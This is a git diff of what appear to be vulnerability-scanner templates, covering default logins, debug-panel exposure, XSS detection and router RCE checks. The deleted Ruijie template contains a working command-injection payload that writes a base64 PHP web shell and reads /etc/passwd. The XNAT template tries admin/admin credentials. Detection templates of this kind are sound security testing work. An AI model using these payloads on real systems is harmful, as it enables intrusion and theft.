diff --git a/.new-additions b/.new-additions
index 7378e38a41..a8484e671c 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,9 +1,11 @@
+default-logins/xnat-default-login.yaml
 exposed-panels/allied-telesis-exposure.yaml
 exposed-panels/cisco/cisco-anyconnect-vpn.yaml
 exposed-panels/connectwise-backup-manager.yaml
 exposed-panels/nginx-ui-dashboard.yaml
 misconfiguration/debug/ampache-debug.yaml
 misconfiguration/debug/github-debug.yaml
+misconfiguration/debug/werkzeug-debug.yaml
 misconfiguration/healthchecks-ui-exposure.yaml
 misconfiguration/installer/ampache-music-installer.yaml
 misconfiguration/installer/moodle-installer.yaml
diff --git a/.nuclei-ignore b/.nuclei-ignore
index 14806f1dfa..2e8e2a8b54 100644
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@@ -27,6 +27,7 @@ files:
   - cves/2007/CVE-2007-5728.yaml
   - cves/2014/CVE-2014-9608.yaml
   - cves/2018/CVE-2018-5233.yaml
+  - cves/2019/CVE-2019-14696.yaml
   - cves/2020/CVE-2020-11930.yaml
   - cves/2020/CVE-2020-19295.yaml
   - cves/2020/CVE-2020-2036.yaml
diff --git a/cnvd/2021/CNVD-2021-09650.yaml b/cnvd/2021/CNVD-2021-09650.yaml
index 528666e80d..33ea61f263 100644
--- a/cnvd/2021/CNVD-2021-09650.yaml
+++ b/cnvd/2021/CNVD-2021-09650.yaml
@@ -1,12 +1,14 @@
 id: CNVD-2021-09650
 
 info:
-  name: Ruijie EWEB Gateway Platform - Remote Command Injection
-  author: daffainfo
+  name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
+  author: daffainfo,pikpikcu
   severity: critical
   description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
   reference:
     - http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
+    - https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
+    - https://www.ruijienetworks.com
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 10.0
diff --git a/cves/2019/CVE-2019-14696.yaml b/cves/2019/CVE-2019-14696.yaml
index 2eea2b4949..686ad935a3 100644
--- a/cves/2019/CVE-2019-14696.yaml
+++ b/cves/2019/CVE-2019-14696.yaml
@@ -1,7 +1,7 @@
 id: CVE-2019-14696
 
 info:
-  name: Open-Scool 3.0/Community Edition 2.3 - Cross-Site Scripting
+  name: Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
   description: Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter.
@@ -15,7 +15,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2019-14696
     cwe-id: CWE-79
-  tags: packetstorm,cve,cve2019,xss
+  tags: xss,open-school,packetstorm,cve,cve2019
 
 requests:
   - method: GET
@@ -24,12 +24,19 @@ requests:
 
     matchers-condition: and
     matchers:
+
+      - type: word
+        part: body
+        words:
+          - '<script>alert(document.domain)</script>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
       - type: status
         status:
           - 200
-      - type: word
-        words:
-          - '<script>alert(document.domain)</script>'
-        part: body
 
 # Enhanced by mp on 2022/08/08
diff --git a/default-logins/activemq/activemq-default-login.yaml b/default-logins/activemq/activemq-default-login.yaml
index 843f3e8cab..877245b4ae 100644
--- a/default-logins/activemq/activemq-default-login.yaml
+++ b/default-logins/activemq/activemq-default-login.yaml
@@ -3,7 +3,7 @@ id: activemq-default-login
 info:
   name: Apache ActiveMQ Default Login
   author: pdteam
-  severity: medium
+  severity: high
   description: Apache ActiveMQ default login information was discovered.
   reference:
     - https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html
diff --git a/default-logins/xnat-default-login.yaml b/default-logins/xnat-default-login.yaml
new file mode 100644
index 0000000000..8c9a28b01e
--- /dev/null
+++ b/default-logins/xnat-default-login.yaml
@@ -0,0 +1,42 @@
+id: xnat-default-login
+
+info:
+  name: XNAT Default Login
+  author: 0x_Akoko
+  severity: high
+  description: XNAT default login information (admin/admin) was discovered.
+  reference:
+    - https://wiki.xnat.org/documentation/xnat-administration/xnat-setup-first-time-configuration#:~:text=Log%20in%20with%20the%20username%20admin%20and%20password%20admin
+  metadata:
+    verified: true
+    shodan-query: http.title:"XNAT"
+  tags: default-login,xnat
+
+requests:
+  - raw:
+      - |
+        POST /login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        login_method=localdb&username={{username}}&password={{password}}&login=&XNAT_CSRF=
+
+    attack: pitchfork
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "app/template/Index.vm?login=true"
+          - "JSESSIONID"
+        condition: and
+
+      - type: status
+        status:
+          - 302
diff --git a/misconfiguration/debug/werkzeug-debug.yaml b/misconfiguration/debug/werkzeug-debug.yaml
new file mode 100644
index 0000000000..5e8d5d99f6
--- /dev/null
+++ b/misconfiguration/debug/werkzeug-debug.yaml
@@ -0,0 +1,28 @@
+id: flask-werkzeug-debug
+
+info:
+  name: Flask Werkzeug Debugger Exposure
+  author: DhiyaneshDk
+  severity: low
+  metadata:
+    verified: true
+    shodan-query: title:"TypeError"
+  tags: werkzeug,exposure,debug
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'TypeError:'
+          - 'Werkzeug powered traceback interpreter'
+        condition: and
+
+      - type: status
+        status:
+          - 500
diff --git a/vulnerabilities/ruijie/ruijie-networks-rce.yaml b/vulnerabilities/ruijie/ruijie-networks-rce.yaml
deleted file mode 100644
index bf405a66f3..0000000000
--- a/vulnerabilities/ruijie/ruijie-networks-rce.yaml
+++ /dev/null
@@ -1,43 +0,0 @@
-id: ruijie-networks-rce
-
-info:
-  name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
-  author: pikpikcu
-  description: Ruijie Networks EWEB Network Management System is susceptible to remote code execution.
-  severity: critical
-  reference:
-    - https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
-    - https://www.ruijienetworks.com
-  classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
-    cwe-id: CWE-77
-  tags: ruijie,rce,network
-
-requests:
-  - raw:
-      - |
-        POST /guest_auth/guestIsUp.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded;charset=UTF-8
-
-        ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00
-
-      - |
-        GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded;charset=UTF-8
-
-    matchers-condition: and
-    matchers:
-      - type: regex
-        regex:
-          - "root:.*:0:0:"
-          - "nobody:x:0:0:"
-        part: body
-
-      - type: status
-        status:
-          - 200
-
-# Enhanced by mp on 2022/06/03